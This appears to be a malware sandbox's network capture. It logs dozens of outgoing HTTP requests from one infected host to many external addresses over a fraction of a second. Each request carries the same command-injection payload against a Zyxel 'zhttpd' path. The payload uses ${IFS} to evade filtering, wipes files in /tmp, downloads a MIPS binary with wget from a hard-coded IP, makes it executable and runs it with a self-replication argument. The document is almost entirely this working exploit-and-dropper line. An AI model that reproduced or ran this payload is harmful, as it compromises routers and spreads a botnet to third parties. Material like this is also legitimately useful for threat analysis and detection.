                                            Jan 14, 2024 15:50:39.415627956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4332192.168.2.234695074.25.37.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415673018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4333192.168.2.2351232160.232.181.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415704966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4334192.168.2.2360902160.42.138.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415750980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4335192.168.2.2338774114.8.9.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415771008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4336192.168.2.2347634212.179.93.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415780067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4337192.168.2.234009443.22.207.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415801048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4338192.168.2.2349508129.243.90.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415821075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4339192.168.2.2349716159.52.188.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415834904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4340192.168.2.2339848147.56.35.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415872097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4341192.168.2.235245686.161.62.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415945053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4342192.168.2.233303281.233.21.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415957928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4343192.168.2.233495069.163.69.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.415990114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4344192.168.2.235077889.253.103.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416018963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4345192.168.2.2338228164.214.232.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416040897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4346192.168.2.235752625.10.114.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416073084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4347192.168.2.2336458141.214.77.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416098118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4348192.168.2.2344632104.162.43.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416122913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4349192.168.2.2360832137.94.95.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416143894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4350192.168.2.2358004123.115.119.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416196108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4351192.168.2.2335186122.158.19.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416222095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4352192.168.2.234341041.208.172.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416279078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4353192.168.2.233339893.206.46.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416300058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4354192.168.2.2335938216.126.27.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416332960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4355192.168.2.23529869.178.36.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416372061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4356192.168.2.2350344139.217.118.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416424990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4357192.168.2.2346790154.89.79.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416439056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4358192.168.2.2336016105.222.179.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416476011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4359192.168.2.2336208190.185.99.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416620016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4360192.168.2.2360518168.88.28.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416645050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4361192.168.2.2340324128.130.96.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416647911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4362192.168.2.235628077.27.226.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416692972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4363192.168.2.2354292155.248.212.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416723013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4364192.168.2.233931225.105.167.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416738033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4365192.168.2.2358898210.227.182.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416778088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4366192.168.2.2338496192.115.180.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416836023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4367192.168.2.233989295.158.239.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416877031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4368192.168.2.23401885.234.132.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416903973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4369192.168.2.2336786150.129.4.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416935921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4370192.168.2.234039290.138.19.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416965008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4371192.168.2.2351044114.38.87.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.416994095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4372192.168.2.23374745.0.246.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417032957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4373192.168.2.235035866.169.37.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417059898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4374192.168.2.2333824103.52.138.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417083025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4375192.168.2.233477487.122.192.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417105913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4376192.168.2.235314862.202.87.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417160034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4377192.168.2.2345404197.147.191.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417171001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4378192.168.2.2336204118.55.226.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417212963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4379192.168.2.234582461.139.218.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417242050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4380192.168.2.234217664.245.122.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417263031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4381192.168.2.2334264163.89.113.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417301893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4382192.168.2.233708613.107.105.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417342901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4383192.168.2.234222850.214.124.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417362928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4384192.168.2.234736497.55.226.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417397976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4385192.168.2.233851861.136.244.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417454958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4386192.168.2.234700227.183.31.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417484045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4387192.168.2.2349950167.18.143.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417504072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4388192.168.2.234057035.31.73.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417535067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4389192.168.2.2334818222.137.149.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417568922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4390192.168.2.234808825.137.83.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417598963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4391192.168.2.23488665.50.200.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417654037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4392192.168.2.2345384212.133.141.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417663097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4393192.168.2.2334702157.198.145.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.417715073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4394192.168.2.2353466205.247.65.157443
                                            TimestampBytes transferredDirectionData
